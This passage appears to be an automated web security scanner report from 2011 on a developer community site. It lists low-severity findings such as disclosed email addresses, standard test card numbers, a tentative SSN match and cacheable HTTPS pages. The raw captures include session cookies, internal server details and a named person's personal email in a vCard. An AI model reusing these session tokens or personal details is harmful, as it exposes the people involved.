<support@zapatec.com>
...[SNIP]...

8.34. https://www.x.com/resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/people/BaldGeek
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:50 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 657477
JP: D=368 t=1313156330206991
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

8.35. https://www.x.com/resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:43 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Vary: User-Agent
Content-Type: text/javascript
JP: D=43847 t=1313156323842940
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

8.36. https://www.x.com/themes/paypal/js/custom.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /themes/paypal/js/custom.js

Issue detail

The following email address was disclosed in the response:

Request

GET /themes/paypal/js/custom.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/ppx/ec
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 31770
JP: D=418 t=1313114381172952
Vary: User-Agent
Connection: close

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a - preview 2008.12.26
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:

...[SNIP]...

9. Social security numbers disclosed

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.x.com
Path:   /docs/DOC-3251

Issue detail

The following social security number was disclosed in the response:

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.

Request

GET /docs/DOC-3251 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333235313b3130322c333432373b3130322c333337353b3130322c333432363b3130322c333433313b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:55 GMT; Path=/
Vary: User-Agent
JP: D=152122 t=1313157235677820
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-external-small" href="/servlet/JiveServlet/downloadBody/2724-102-10-3104/PayPalApp.pdf">
...[SNIP]...
<a class="jive-link-external-small" href="/servlet/JiveServlet/downloadBody/2724-102-10-3104/PayPalApp.pdf">
...[SNIP]...

10. Credit card numbers disclosed

There are 2 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


10.1. https://www.x.com/community/feeds/documents

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds/documents

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /community/feeds/documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:09 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 11 Aug 2011 22:17:57 GMT
Etag: "1313101077659"
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
JP: D=39783 t=1313157009161570
Cache-Control: no-cache, private
Vary: User-Agent
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:rdf="http://www.w3.org/1
...[SNIP]...
mall" href="https://www.x.com/docs/DOC-1642"&gt;post&lt;/a&gt; regarding using the Request ID.&lt;br/&gt;&lt;br/&gt;Example:&lt;br/&gt;&lt;br/&gt;TRXTYPE=S&amp;amp;TENDER=C&amp;amp;AMT=11&amp;amp;ACCT=4012888888881881&amp;amp;EXPDATE=0119&amp;amp;&lt;br/&gt;INVNUM=PONUM1&amp;amp;VERBOSITY=HIGH&amp;amp;STREET=123 Main St&amp;amp;&lt;br/&gt;PONUM=010001&amp;amp;&lt;strong&gt;ORDERID=1ef2ca34bc24e66fa&lt;br/&gt;&lt;/s
...[SNIP]...
the following items: TRXTYPE, TENDER, ACCT and EXPDATE.&lt;br/&gt;&lt;br/&gt;Example:&lt;br/&gt;&lt;br/&gt;&lt;strong style="color: #ff0000; "&gt;TRXTYPE=L&lt;/strong&gt;&amp;amp;TENDER=C&amp;amp;ACCT=5105105105105100&amp;amp;EXPDATE=1212&amp;amp;&lt;br/&gt;FIRSTNAME=Ted&amp;amp;LASTNAME=Smith&amp;amp;STREET=123 Main Street&amp;amp;City=San Jose&amp;amp;&lt;br/&gt;STATE=CA&amp;amp;ZIP=12345&amp;amp;PHONE=123-123-12
...[SNIP]...
ofile to run every day for X number of Days.&lt;br/&gt;&lt;br/&gt;Example:&lt;br/&gt;TRXTYPE=R&amp;amp;TENDER=C&amp;amp;ACTION=A&amp;amp;PROFILENAME=MyProfile&amp;amp;AMT=20.00&amp;amp;&lt;br/&gt;ACCT=4111111111111111&amp;amp;EXPDATE=0213&amp;amp;START=01252010&amp;amp;&lt;strong style="color: #ff0000; "&gt;PAYPERIOD=DAYS&lt;br/&gt;&lt;/strong&gt;&amp;amp;TERM=2&amp;amp;COMMENT1=First-time customer&amp;amp;OPTIONAL
...[SNIP]...
and EMAIL parameters with the appropriate data.&amp;#160; To receive the response VERBOSITY must be set to HIGH.&lt;br/&gt;&lt;br/&gt;Example Request:&lt;br/&gt;TRXTYPE=S&amp;amp;TENDER=C&amp;amp;ACCT=373953192351004&amp;amp;AMT=100.00&amp;amp;EXPDATE=1210&amp;amp;&lt;br/&gt;&lt;strong&gt;PHONENUM=4083456789&lt;/strong&gt;&amp;amp;&lt;strong&gt;VERBOSITY=HIGH&lt;/strong&gt;&amp;amp;&lt;strong&gt;EMAIL=myemail at e
...[SNIP]...
paid debit card with a remaining balance of $100.&lt;br/&gt;&lt;/li&gt;&lt;li&gt;Merchant requests authorization for $75.&lt;br/&gt;&lt;br/&gt;TRXTYPE=A&amp;amp;TENDER=C&amp;amp;AMT=75.00&amp;amp;ACCT=4111111111111111&amp;amp;&lt;span style="color: #ff0000;"&gt;PARTIALAUTH=Y&lt;/span&gt;&amp;amp;EXPDATE=0119&amp;amp;&lt;br/&gt;&lt;span style="color: #ff0000;"&gt;VERBOSITY=HIGH&lt;br/&gt;&lt;/span&gt;&lt;br/&gt;&lt;
...[SNIP]...

10.2. https://www.x.com/docs/DOC-2241

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2241

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /docs/DOC-2241 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333335323b3130322c333332323b3130322c333335313b3130322c333335333b3130322c333335343b3130322c333335353b3130322c333334353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=129237 t=1313157242766813
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<br/>TRXTYPE=S&amp;TENDER=C&amp;AMT=11&amp;ACCT=4012888888881881&amp;EXPDATE=0119&amp;<br/>
...[SNIP]...
</strong>&amp;TENDER=C&amp;ACCT=5105105105105100&amp;EXPDATE=1212&amp;<br/>
...[SNIP]...
<br/>ACCT=4111111111111111&amp;EXPDATE=0213&amp;START=01252010&amp;<strong style="color: #ff0000; ">
...[SNIP]...
<br/>TRXTYPE=S&amp;TENDER=C&amp;ACCT=373953192351004&amp;AMT=100.00&amp;EXPDATE=1210&amp;<br/>
...[SNIP]...

11. Cacheable HTTPS response

There are 68 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


11.1. https://www.x.com/dwr/interface/Clearvote.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /dwr/interface/Clearvote.js

Request

GET /dwr/interface/Clearvote.js HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/index.jspa
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:27 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:50:30 GMT
Cache-Control: max-age=60
Content-Type: text/plain
Content-Length: 810
JP: D=267 t=1313114368350872
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (Clearvote == null) var Clearvot
...[SNIP]...

11.2. https://www.x.com/ideas/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /ideas/

Request

GET /ideas/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: User-Agent
JP: D=66606589 t=1313157225229043
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.3. https://www.x.com/opensearch.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /opensearch.xml

Request

GET /opensearch.xml HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:07 GMT
Server: Apache-Coyote/1.1
Content-Type: application/opensearchdescription+xml;charset=UTF-8
Vary: User-Agent
JP: D=2678 t=1313157007976957
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>X Developer Network</ShortName>
<Description>Search X Developer Network</D
...[SNIP]...

11.4. https://www.x.com/people

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people

Request

GET /people HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=3394146 t=1313157260109910
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.5. https://www.x.com/people/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/

Request

GET /people/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=2685593 t=1313157107815185
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.6. https://www.x.com/people/BaldGeek

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek

Request

GET /people/BaldGeek HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:49 GMT; Path=/
Vary: User-Agent
JP: D=151430 t=1313156329683258
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.7. https://www.x.com/people/BaldGeek.vcf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek.vcf

Request

GET /people/BaldGeek.vcf HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/x-vcard;charset=UTF-8
Content-Language: en-US
JP: D=5452 t=1313157111270263
Vary: User-Agent
Connection: close

BEGIN:VCARD
VERSION:3.0
FN:Naveed Anwar
ORG:PayPal
EMAIL;TYPE=internet:naveedanwar@gmail.com
TZ:Pacific Standard Time
URL:http://x.com
END:VCARD

11.8. https://www.x.com/people/BaldGeek/blog

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek/blog

Request

GET /people/BaldGeek/blog HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=127143 t=1313157109294622
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.9. https://www.x.com/people/CorinneSherman

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/CorinneSherman

Request

GET /people/CorinneSherman HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:54 GMT; Path=/
Vary: User-Agent
JP: D=153786 t=1313157114086096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.10. https://www.x.com/people/GiancarloUk2

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/GiancarloUk2

Request

GET /people/GiancarloUk2 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38383139383b332c3131353037373b332c3130383730353b332c3131303734313b332c3131303831343b332c38323534333b332c3131353130373b332c38353530363b332c3131313737343b332c38373839383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=109527 t=1313157149159421
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.11. https://www.x.com/people/IndieReign

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/IndieReign

Request

GET /people/IndieReign HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303730373b332c38383139383b332c38373839383b332c3134313133383b332c38353530363b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3131353037373b; Expires=Sun, 11-Sep-2011 13:52:30 GMT; Path=/
Vary: User-Agent
JP: D=98253 t=1313157150770204
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.12. https://www.x.com/people/JasonVenner

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/JasonVenner

Request

GET /people/JasonVenner HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:49 GMT; Path=/
Vary: User-Agent
JP: D=146802 t=1313157109565171
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.13. https://www.x.com/people/MrcheckAPX

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/MrcheckAPX

Request

GET /people/MrcheckAPX HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:48 GMT; Path=/
Vary: User-Agent
JP: D=97089 t=1313157168042186
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.14. https://www.x.com/people/PP_Igor

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_Igor

Request

GET /people/PP_Igor HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:09 GMT; Path=/
Vary: User-Agent
JP: D=77818 t=1313157129602041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.15. https://www.x.com/people/PP_MTS_Andre

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Andre

Request

GET /people/PP_MTS_Andre HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:06 GMT; Path=/
Vary: User-Agent
JP: D=85787 t=1313157126041615
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.16. https://www.x.com/people/PP_MTS_Chad

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Chad

Request

GET /people/PP_MTS_Chad HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=167980 t=1313157123846369
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.17. https://www.x.com/people/PP_MTS_GuidoT

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_GuidoT

Request

GET /people/PP_MTS_GuidoT HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b; Expires=Sun, 11-Sep-2011 13:52:07 GMT; Path=/
Vary: User-Agent
JP: D=96030 t=1313157127847926
Connection: close

